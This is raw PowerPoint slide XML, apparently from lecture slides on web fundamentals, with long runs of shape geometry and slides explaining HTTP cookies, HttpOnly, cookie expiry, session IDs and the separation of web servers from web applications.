              <a:gd name="connsiteY4" fmla="*/ 1463686 h 1560050"/>
              <a:gd name="connsiteX5" fmla="*/ 0 w 7913906"/>
              <a:gd name="connsiteY5" fmla="*/ 1560050 h 1560050"/>
              <a:gd name="connsiteX6" fmla="*/ 54047 w 7913906"/>
              <a:gd name="connsiteY6" fmla="*/ 519782 h 1560050"/>
              <a:gd name="connsiteX7" fmla="*/ 1418722 w 7913906"/>
              <a:gd name="connsiteY7" fmla="*/ 546802 h 1560050"/>
              <a:gd name="connsiteX8" fmla="*/ 1391699 w 7913906"/>
              <a:gd name="connsiteY8" fmla="*/ 6403 h 1560050"/>
              <a:gd name="connsiteX9" fmla="*/ 1337652 w 7913906"/>
              <a:gd name="connsiteY9" fmla="*/ 6403 h 1560050"/>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1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84848"/>
              <a:gd name="connsiteX1" fmla="*/ 7853460 w 7859859"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1484848"/>
              <a:gd name="connsiteX2" fmla="*/ 7859859 w 7859859"/>
              <a:gd name="connsiteY2" fmla="*/ 1033865 h 1484848"/>
              <a:gd name="connsiteX3" fmla="*/ 2232619 w 7859859"/>
              <a:gd name="connsiteY3" fmla="*/ 1044173 h 1484848"/>
              <a:gd name="connsiteX4" fmla="*/ 2229420 w 7859859"/>
              <a:gd name="connsiteY4" fmla="*/ 1463686 h 1484848"/>
              <a:gd name="connsiteX5" fmla="*/ 12797 w 7859859"/>
              <a:gd name="connsiteY5" fmla="*/ 1484848 h 1484848"/>
              <a:gd name="connsiteX6" fmla="*/ 0 w 7859859"/>
              <a:gd name="connsiteY6" fmla="*/ 519782 h 1484848"/>
              <a:gd name="connsiteX7" fmla="*/ 1364675 w 7859859"/>
              <a:gd name="connsiteY7" fmla="*/ 546802 h 1484848"/>
              <a:gd name="connsiteX8" fmla="*/ 1337652 w 7859859"/>
              <a:gd name="connsiteY8" fmla="*/ 6403 h 1484848"/>
              <a:gd name="connsiteX9" fmla="*/ 1283605 w 7859859"/>
              <a:gd name="connsiteY9" fmla="*/ 6403 h 1484848"/>
              <a:gd name="connsiteX0" fmla="*/ 1295975 w 7872229"/>
              <a:gd name="connsiteY0" fmla="*/ 6403 h 1476492"/>
              <a:gd name="connsiteX1" fmla="*/ 7865830 w 7872229"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1476492"/>
              <a:gd name="connsiteX2" fmla="*/ 7872229 w 7872229"/>
              <a:gd name="connsiteY2" fmla="*/ 1033865 h 1476492"/>
              <a:gd name="connsiteX3" fmla="*/ 2244989 w 7872229"/>
              <a:gd name="connsiteY3" fmla="*/ 1044173 h 1476492"/>
              <a:gd name="connsiteX4" fmla="*/ 2241790 w 7872229"/>
              <a:gd name="connsiteY4" fmla="*/ 1463686 h 1476492"/>
              <a:gd name="connsiteX5" fmla="*/ 101 w 7872229"/>
              <a:gd name="connsiteY5" fmla="*/ 1476492 h 1476492"/>
              <a:gd name="connsiteX6" fmla="*/ 12370 w 7872229"/>
              <a:gd name="connsiteY6" fmla="*/ 519782 h 1476492"/>
              <a:gd name="connsiteX7" fmla="*/ 1377045 w 7872229"/>
              <a:gd name="connsiteY7" fmla="*/ 546802 h 1476492"/>
              <a:gd name="connsiteX8" fmla="*/ 1350022 w 7872229"/>
              <a:gd name="connsiteY8" fmla="*/ 6403 h 1476492"/>
              <a:gd name="connsiteX9" fmla="*/ 1295975 w 7872229"/>
              <a:gd name="connsiteY9" fmla="*/ 6403 h 1476492"/>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34713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64675 w 7859859"/>
              <a:gd name="connsiteY7" fmla="*/ 546802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37652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72765 w 7859859"/>
              <a:gd name="connsiteY7" fmla="*/ 53844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7 w 7859859"/>
              <a:gd name="connsiteY7" fmla="*/ 530091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496668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97831 w 7859859"/>
              <a:gd name="connsiteY7" fmla="*/ 538447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289475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06186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13380 h 1463686"/>
              <a:gd name="connsiteX8" fmla="*/ 1312585 w 7859859"/>
              <a:gd name="connsiteY8" fmla="*/ 6403 h 1463686"/>
              <a:gd name="connsiteX9" fmla="*/ 1283605 w 7859859"/>
              <a:gd name="connsiteY9" fmla="*/ 6403 h 1463686"/>
              <a:gd name="connsiteX0" fmla="*/ 1283605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283605 w 7859859"/>
              <a:gd name="connsiteY9" fmla="*/ 6403 h 1463686"/>
              <a:gd name="connsiteX0" fmla="*/ 1968752 w 7859859"/>
              <a:gd name="connsiteY0" fmla="*/ 365701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1968752 w 7859859"/>
              <a:gd name="connsiteY9" fmla="*/ 365701 h 1463686"/>
              <a:gd name="connsiteX0" fmla="*/ 2043951 w 7859859"/>
              <a:gd name="connsiteY0" fmla="*/ 6403 h 1463686"/>
              <a:gd name="connsiteX1" fmla="*/ 7853460 w 7859859"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1463686"/>
              <a:gd name="connsiteX2" fmla="*/ 7859859 w 7859859"/>
              <a:gd name="connsiteY2" fmla="*/ 1033865 h 1463686"/>
              <a:gd name="connsiteX3" fmla="*/ 2232619 w 7859859"/>
              <a:gd name="connsiteY3" fmla="*/ 1044173 h 1463686"/>
              <a:gd name="connsiteX4" fmla="*/ 2229420 w 7859859"/>
              <a:gd name="connsiteY4" fmla="*/ 1463686 h 1463686"/>
              <a:gd name="connsiteX5" fmla="*/ 4442 w 7859859"/>
              <a:gd name="connsiteY5" fmla="*/ 1459780 h 1463686"/>
              <a:gd name="connsiteX6" fmla="*/ 0 w 7859859"/>
              <a:gd name="connsiteY6" fmla="*/ 519782 h 1463686"/>
              <a:gd name="connsiteX7" fmla="*/ 1322897 w 7859859"/>
              <a:gd name="connsiteY7" fmla="*/ 521736 h 1463686"/>
              <a:gd name="connsiteX8" fmla="*/ 1312585 w 7859859"/>
              <a:gd name="connsiteY8" fmla="*/ 6403 h 1463686"/>
              <a:gd name="connsiteX9" fmla="*/ 2043951 w 7859859"/>
              <a:gd name="connsiteY9" fmla="*/ 6403 h 1463686"/>
              <a:gd name="connsiteX0" fmla="*/ 2849990 w 8665898"/>
              <a:gd name="connsiteY0" fmla="*/ 6403 h 1463686"/>
              <a:gd name="connsiteX1" fmla="*/ 8659499 w 8665898"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1463686"/>
              <a:gd name="connsiteX2" fmla="*/ 8665898 w 8665898"/>
              <a:gd name="connsiteY2" fmla="*/ 1033865 h 1463686"/>
              <a:gd name="connsiteX3" fmla="*/ 3038658 w 8665898"/>
              <a:gd name="connsiteY3" fmla="*/ 1044173 h 1463686"/>
              <a:gd name="connsiteX4" fmla="*/ 3035459 w 8665898"/>
              <a:gd name="connsiteY4" fmla="*/ 1463686 h 1463686"/>
              <a:gd name="connsiteX5" fmla="*/ 2 w 8665898"/>
              <a:gd name="connsiteY5" fmla="*/ 950078 h 1463686"/>
              <a:gd name="connsiteX6" fmla="*/ 806039 w 8665898"/>
              <a:gd name="connsiteY6" fmla="*/ 519782 h 1463686"/>
              <a:gd name="connsiteX7" fmla="*/ 2128936 w 8665898"/>
              <a:gd name="connsiteY7" fmla="*/ 521736 h 1463686"/>
              <a:gd name="connsiteX8" fmla="*/ 2118624 w 8665898"/>
              <a:gd name="connsiteY8" fmla="*/ 6403 h 1463686"/>
              <a:gd name="connsiteX9" fmla="*/ 2849990 w 8665898"/>
              <a:gd name="connsiteY9" fmla="*/ 6403 h 1463686"/>
              <a:gd name="connsiteX0" fmla="*/ 2854430 w 8670338"/>
              <a:gd name="connsiteY0" fmla="*/ 6403 h 1463686"/>
              <a:gd name="connsiteX1" fmla="*/ 8663939 w 8670338"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1463686"/>
              <a:gd name="connsiteX2" fmla="*/ 8670338 w 8670338"/>
              <a:gd name="connsiteY2" fmla="*/ 1033865 h 1463686"/>
              <a:gd name="connsiteX3" fmla="*/ 3043098 w 8670338"/>
              <a:gd name="connsiteY3" fmla="*/ 1044173 h 1463686"/>
              <a:gd name="connsiteX4" fmla="*/ 3039899 w 8670338"/>
              <a:gd name="connsiteY4" fmla="*/ 1463686 h 1463686"/>
              <a:gd name="connsiteX5" fmla="*/ 4442 w 8670338"/>
              <a:gd name="connsiteY5" fmla="*/ 950078 h 1463686"/>
              <a:gd name="connsiteX6" fmla="*/ 0 w 8670338"/>
              <a:gd name="connsiteY6" fmla="*/ 536493 h 1463686"/>
              <a:gd name="connsiteX7" fmla="*/ 2133376 w 8670338"/>
              <a:gd name="connsiteY7" fmla="*/ 521736 h 1463686"/>
              <a:gd name="connsiteX8" fmla="*/ 2123064 w 8670338"/>
              <a:gd name="connsiteY8" fmla="*/ 6403 h 1463686"/>
              <a:gd name="connsiteX9" fmla="*/ 2854430 w 8670338"/>
              <a:gd name="connsiteY9" fmla="*/ 6403 h 1463686"/>
              <a:gd name="connsiteX0" fmla="*/ 2854430 w 8670338"/>
              <a:gd name="connsiteY0" fmla="*/ 6403 h 1463686"/>
              <a:gd name="connsiteX1" fmla="*/ 8663939 w 8670338"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1463686"/>
              <a:gd name="connsiteX2" fmla="*/ 8670338 w 8670338"/>
              <a:gd name="connsiteY2" fmla="*/ 1033865 h 1463686"/>
              <a:gd name="connsiteX3" fmla="*/ 3026387 w 8670338"/>
              <a:gd name="connsiteY3" fmla="*/ 484336 h 1463686"/>
              <a:gd name="connsiteX4" fmla="*/ 3039899 w 8670338"/>
              <a:gd name="connsiteY4" fmla="*/ 1463686 h 1463686"/>
              <a:gd name="connsiteX5" fmla="*/ 4442 w 8670338"/>
              <a:gd name="connsiteY5" fmla="*/ 950078 h 1463686"/>
              <a:gd name="connsiteX6" fmla="*/ 0 w 8670338"/>
              <a:gd name="connsiteY6" fmla="*/ 536493 h 1463686"/>
              <a:gd name="connsiteX7" fmla="*/ 2133376 w 8670338"/>
              <a:gd name="connsiteY7" fmla="*/ 521736 h 1463686"/>
              <a:gd name="connsiteX8" fmla="*/ 2123064 w 8670338"/>
              <a:gd name="connsiteY8" fmla="*/ 6403 h 1463686"/>
              <a:gd name="connsiteX9" fmla="*/ 2854430 w 8670338"/>
              <a:gd name="connsiteY9" fmla="*/ 6403 h 1463686"/>
              <a:gd name="connsiteX0" fmla="*/ 2854430 w 8670338"/>
              <a:gd name="connsiteY0" fmla="*/ 6403 h 1033865"/>
              <a:gd name="connsiteX1" fmla="*/ 8663939 w 8670338"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1033865"/>
              <a:gd name="connsiteX2" fmla="*/ 8670338 w 8670338"/>
              <a:gd name="connsiteY2" fmla="*/ 1033865 h 1033865"/>
              <a:gd name="connsiteX3" fmla="*/ 3026387 w 8670338"/>
              <a:gd name="connsiteY3" fmla="*/ 484336 h 1033865"/>
              <a:gd name="connsiteX4" fmla="*/ 3039899 w 8670338"/>
              <a:gd name="connsiteY4" fmla="*/ 970695 h 1033865"/>
              <a:gd name="connsiteX5" fmla="*/ 4442 w 8670338"/>
              <a:gd name="connsiteY5" fmla="*/ 950078 h 1033865"/>
              <a:gd name="connsiteX6" fmla="*/ 0 w 8670338"/>
              <a:gd name="connsiteY6" fmla="*/ 536493 h 1033865"/>
              <a:gd name="connsiteX7" fmla="*/ 2133376 w 8670338"/>
              <a:gd name="connsiteY7" fmla="*/ 521736 h 1033865"/>
              <a:gd name="connsiteX8" fmla="*/ 2123064 w 8670338"/>
              <a:gd name="connsiteY8" fmla="*/ 6403 h 1033865"/>
              <a:gd name="connsiteX9" fmla="*/ 2854430 w 8670338"/>
              <a:gd name="connsiteY9" fmla="*/ 6403 h 1033865"/>
              <a:gd name="connsiteX0" fmla="*/ 2854430 w 8670338"/>
              <a:gd name="connsiteY0" fmla="*/ 6403 h 1033865"/>
              <a:gd name="connsiteX1" fmla="*/ 7669640 w 8670338"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1033865"/>
              <a:gd name="connsiteX2" fmla="*/ 8670338 w 8670338"/>
              <a:gd name="connsiteY2" fmla="*/ 1033865 h 1033865"/>
              <a:gd name="connsiteX3" fmla="*/ 3026387 w 8670338"/>
              <a:gd name="connsiteY3" fmla="*/ 484336 h 1033865"/>
              <a:gd name="connsiteX4" fmla="*/ 3039899 w 8670338"/>
              <a:gd name="connsiteY4" fmla="*/ 970695 h 1033865"/>
              <a:gd name="connsiteX5" fmla="*/ 4442 w 8670338"/>
              <a:gd name="connsiteY5" fmla="*/ 950078 h 1033865"/>
              <a:gd name="connsiteX6" fmla="*/ 0 w 8670338"/>
              <a:gd name="connsiteY6" fmla="*/ 536493 h 1033865"/>
              <a:gd name="connsiteX7" fmla="*/ 2133376 w 8670338"/>
              <a:gd name="connsiteY7" fmla="*/ 521736 h 1033865"/>
              <a:gd name="connsiteX8" fmla="*/ 2123064 w 8670338"/>
              <a:gd name="connsiteY8" fmla="*/ 6403 h 1033865"/>
              <a:gd name="connsiteX9" fmla="*/ 2854430 w 8670338"/>
              <a:gd name="connsiteY9" fmla="*/ 6403 h 103386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484336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526115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 name="connsiteX0" fmla="*/ 2854430 w 7676039"/>
              <a:gd name="connsiteY0" fmla="*/ 6403 h 970695"/>
              <a:gd name="connsiteX1" fmla="*/ 7669640 w 7676039"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 970695"/>
              <a:gd name="connsiteX2" fmla="*/ 7676039 w 7676039"/>
              <a:gd name="connsiteY2" fmla="*/ 515807 h 970695"/>
              <a:gd name="connsiteX3" fmla="*/ 3026387 w 7676039"/>
              <a:gd name="connsiteY3" fmla="*/ 484336 h 970695"/>
              <a:gd name="connsiteX4" fmla="*/ 3039899 w 7676039"/>
              <a:gd name="connsiteY4" fmla="*/ 970695 h 970695"/>
              <a:gd name="connsiteX5" fmla="*/ 4442 w 7676039"/>
              <a:gd name="connsiteY5" fmla="*/ 950078 h 970695"/>
              <a:gd name="connsiteX6" fmla="*/ 0 w 7676039"/>
              <a:gd name="connsiteY6" fmla="*/ 536493 h 970695"/>
              <a:gd name="connsiteX7" fmla="*/ 2133376 w 7676039"/>
              <a:gd name="connsiteY7" fmla="*/ 521736 h 970695"/>
              <a:gd name="connsiteX8" fmla="*/ 2123064 w 7676039"/>
              <a:gd name="connsiteY8" fmla="*/ 6403 h 970695"/>
              <a:gd name="connsiteX9" fmla="*/ 2854430 w 7676039"/>
              <a:gd name="connsiteY9" fmla="*/ 6403 h 97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76039" h="970695">
                <a:moveTo>
                  <a:pt x="2854430" y="6403"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7669640" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7676039" y="515807"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3026387" y="484336"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3025321" y="674308"/>
                  <a:pt x="3040965" y="780723"/>
                  <a:pt x="3039899" y="970695"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4442" y="950078"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2961" y="636745"/>
                  <a:pt x="1481" y="849826"/>
                  <a:pt x="0" y="536493"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2133376" y="521736"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2135509" y="347173"/>
                  <a:pt x="2120931" y="180966"/>
                  <a:pt x="2123064" y="6403"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2854430" y="6403"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:cu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913333" y="2279438"/>
            <a:ext cx="1668110"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a:off x="869945" y="2779476"/>
            <a:ext cx="4160037"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07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3" grpId="0" animBg="1"/>
      <p:bldP spid="13" grpId="1" animBg="1"/>
      <p:bldP spid="15" grpId="0" animBg="1"/>
      <p:bldP spid="15" grpId="1" animBg="1"/>
      <p:bldP spid="16" grpId="0" animBg="1"/>
      <p:bldP spid="16" grpId="1"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Three Central Questions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>How to name a resource?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>How to request and serve a resource?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>How to create hypertext?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30594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8279"/>
            <a:ext cx="8229600" cy="5747885"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Set-Cookie: NID=67=bs1lLyrXtfdUj79IlcuqR7_MWEsyNdLWU_FpGKwlWR9QpEzi3UrVV2UGO6LBW3sJNk9mlLcYIJns3PG3NUu-M3pT9qD-V4F8oyyJ_UJnCGKDUDGbllL9Ha8KGufv0MUv; expires=Sat, 18-Jul-2015 16:11:12 GMT; path=/; domain=.google.com; HttpOnly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>HttpOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is a security feature, which means only send this cookie in HTTP, do not allow JavaScript code to access the cookie</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5291983" y="3850323"/>
            <a:ext cx="1943840" cy="51444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82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Embedding Information in Cookies	</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The server can request the deletion of cookies by setting the "expires" cookie attribute to a date in the past</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User agent should then delete cookie with that name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Set-Cookie: USER=foo; expires=Thu, 1-Jan-2015 16:11:12 GMT;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US" noProof="1">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>User agent will then delete the cookie with name "USER" that is associated with this domain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US" noProof="1">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Proxies are not supposed to cache cookie headers	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US" noProof="1">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Why?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="52677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Embedding Information in Cookies	</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User agent is responsible for following the server's policies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Expiring cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Restricting cookies to the proper domains and paths</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>However, user agent is free to delete cookies at any time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Space/storage restrictions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User decides to clear the cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="151446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Modern Sessions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sessions are used to represent a time-limited interaction of a user with a web server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There is no concept of a "session" at the HTTP level, and therefore it has to be implemented at the web application level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using URL parameters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using hidden form fields</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In the most common use of sessions, the server generates a unique (random and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>unguessable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) session ID and sends it to the user agent as a cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>On subsequent requests, user agent sends the session ID to the server, and the server uses the session ID to index the server's session information</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17151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Designing Web Applications</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In the early days of the web, one would write a "web application" by writing a custom web server that received HTTP requests, ran custom code based on the URL path and query data, and returned a dynamically created HTML page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The drawback here is that one would have to keep the web server up-to-date with the latest HTTP changes (HTTP/1.1 spec is 175 pages)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Generally decided that it was a good idea to separate the concerns into a web server, which accepted HTTP request and forwarded relevant requests to a web application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Could develop a web application without worrying about HTTP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10778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Web Application Overview </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5333571" y="2577715"/>
            <a:ext cx="1817428" cy="1817428"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="skd188256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30" y="2853249"/>
            <a:ext cx="2106285" cy="1805139"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="firef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09" y="3001135"/>
            <a:ext cx="810980" cy="720420"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Arrow Connector 7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1623186" y="3009767"/>
            <a:ext cx="3725955"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23188" y="3383737"/>
            <a:ext cx="3725953"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0501" y="2528279"/>
            <a:ext cx="2204096" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>HTTP Request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2360501" y="3490722"/>
            <a:ext cx="2356496" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>HTTP Response</a:t>
